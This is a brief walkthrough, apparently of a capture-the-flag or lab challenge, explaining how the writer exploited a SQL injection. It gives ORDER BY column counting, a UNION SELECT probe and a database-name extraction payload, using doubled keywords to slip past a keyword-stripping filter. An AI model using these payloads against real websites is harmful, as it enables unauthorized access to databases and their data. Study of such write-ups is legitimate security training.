In this question I first found the number of coulums by using ' oorr 1 ooorrderrder by 1 -- - and saw there were 14 of them by each time incrementing the index from 1 to 15 where no result for 15.
Then I looked at which column is vulnerable by ' or 1 union (select 1,2,3,4,5,6,7,8,9,10,11,12,13,14) -- -. 
Now I placed all my queries in second column.
To get the database name query : ' oorr 1 ununionion (selselectect null,database(),null,null,null,null,null,null,null,null,null,null,null,null) -- -